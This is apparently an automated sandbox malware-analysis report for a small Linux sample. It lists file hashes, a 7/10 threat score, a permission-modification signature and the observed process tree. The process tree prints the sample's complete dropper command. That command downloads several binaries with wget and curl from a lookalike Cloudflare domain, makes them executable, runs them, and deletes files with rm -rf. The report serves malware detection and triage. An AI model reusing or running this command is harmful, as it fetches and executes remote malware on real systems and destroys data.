Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/12/2024, 13:55
Behavioral task
behavioral1
Sample
d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
Resource
ubuntu1804-amd64-20240729-en
1 signatures
150 seconds
General
-
Target
d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
-
Size
1KB
-
MD5
6b13e69cc37757b1f2dbc2a1c8f806f1
-
SHA1
01364dc40e5f1005fd7cd6e087368d64b35896f7
-
SHA256
d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
-
SHA512
c46a38378e024c06251f3aa61a35a2e31f2e6a17da1284d100d78de0708a1e0852b10da74d59ec888e374a3ed8c0533851e46410d0df48da901b151b086ffdab
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1503 sh 1505 chmod
Processes
-
/tmp/d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374/tmp/d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f563741⤵PID:1503
-
/bin/sh/bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/; chmod 777 /var/tmp/incbit; curl http://dash.cloudflare.ovh/mvt/incbit -s -o /var/tmp/incbit; chmod 777 /var/tmp/incbit; cd /var/tmp; ./incbit; cd /var/tmp; rm incbit; wget -nc http://dash.cloudflare.ovh/mvt/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://dash.cloudflare.ovh/mvt/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; ./lushput 'wget -nc http://dash.cloudflare.ovh/mvt/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://dash.cloudflare.ovh/mvt/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf .pkexec; wget -nc http://dash.cloudflare.ovh/mvt/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://dash.cloudflare.ovh/mvt/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://dash.cloudflare.ovh/mvt/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://dash.cloudflare.ovh/mvt/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; ./loadbit 2>/dev/null; cd /tmp; rm -rf *"1⤵
- File and Directory Permissions Modification
PID:1503 -
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/2⤵PID:1504
-
-
/bin/chmodchmod 777 /var/tmp/incbit2⤵
- File and Directory Permissions Modification
PID:1505
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/incbit -s -o /var/tmp/incbit2⤵PID:1506
-